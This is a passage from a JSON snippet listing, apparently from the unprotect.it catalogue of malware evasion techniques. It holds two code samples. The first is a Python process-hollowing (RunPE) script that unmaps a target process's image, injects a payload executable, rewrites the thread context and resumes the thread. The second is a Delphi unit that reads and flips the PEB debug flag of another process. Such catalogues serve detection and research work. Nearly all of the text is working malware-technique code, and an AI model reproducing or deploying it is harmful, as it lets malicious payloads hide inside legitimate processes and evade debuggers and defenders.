Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n                                c_int(payload_size+1),\r\n                                MEM_COMMIT | MEM_RESERVE,\r\n                                PAGE_READWRITE)\r\n\r\n\r\nmemmove(                        payload_data_pointer,\r\n                                payload_data,\r\n                                payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n         error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress ==  payload_ImageBase:\r\n        if not windll.ntdll.NtUnmapViewOfSection(\r\n                                hProcess,\r\n                                target_ImageBase):\r\n                error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n                                hProcess, \r\n                                c_char_p(payload_ImageBase), \r\n                                c_int(payload_SizeOfImage), \r\n                                MEM_COMMIT|MEM_RESERVE, \r\n                                PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n        error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(payload_ImageBase),\r\n                                c_char_p(payload_data_pointer),\r\n                                c_int(payload_SizeOfHeaders),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n        section = payload_sections[i]\r\n        dst = payload_ImageBase + section.VirtualAddress\r\n        src = payload_data_pointer + section.PointerToRawData\r\n        size = section.SizeOfRawData\r\n        print\r\n        print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n        stepcount += 1\r\n        print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n        print \"\\t[+]Writing to: \" + str(hex(dst))\r\n        print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n        lpNumberOfBytesWritten  = c_size_t(0)\r\n\r\n        if windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(dst),\r\n                                c_char_p(src),\r\n                                c_int(size),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                 error()\r\n                 \r\n        print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n         \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten  = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(cx.Ebx+8),\r\n                                c_char_p(payload_data_pointer+0x11C),\r\n                                c_int(4),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n         error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n                                hThread,\r\n                                byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n        error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/61/",
            "description": "",
            "plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n        PROCESS_BASIC_INFORMATION         = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n                                            ProcessHandle : THandle;\r\n                                            ProcessInformationClass : DWORD;\r\n                                            ProcessInformation : Pointer;\r\n                                            ProcessInformationLength :\r\n                                            ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n    hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n{$ELSE}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n    Open a process and retrieve the point of debug flag from PEB.\r\n\r\n    If function succeed, don't forget to call close process handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI     : TProcessBasicInformation;\r\n    ARetLen : Cardinal;\r\nbegin\r\n    result := nil;\r\n    ///\r\n\r\n    AProcessHandle := 0;\r\n\r\n    if NOT Assigned(_NtQueryInformationProcess) then\r\n    Exit();\r\n    ///\r\n\r\n    AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n    if (AProcessHandle = 0) then\r\n    Exit;\r\n\r\n    if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n    result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n    else\r\n    CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Retrieve the target process debug status from PEB.\r\n\r\n    ADebugStatus = True  : Target process debug flag is set.\r\n    ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    pDebugFlag       : pByte;\r\n    ABytesRead       : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    getMem(pDebugFlag, sizeOf(Byte));\r\n    try\r\n        if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n        Exit;\r\n\r\n        ///\r\n        ADebugStatus := (pDebugFlag^ = 1);\r\n    finally\r\n        FreeMem(pDebugFlag);\r\n    end;\r\n\r\n    ///\r\n    result := (ABytesRead = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Update target process debug flag.\r\n\r\n    ADebugStatus = True  : Set target process debug flag.\r\n    ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    ADebugFlag       : Byte;\r\n    ABytesWritten    : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    if ADebugStatus then\r\n        ADebugFlag := 1\r\n    else\r\n        ADebugFlag := 0;\r\n\r\n    if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n        Exit;\r\n\r\n    ///\r\n    result := (ABytesWritten = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\ninitialization\r\n    {\r\n    Load NtQueryInformationProcess from NTDLL.dll\r\n    }\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n    if (hNTDLL <> 0) then\r\n    @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    if (hNTDLL <> 0) then\r\n    FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
        }
    ]
}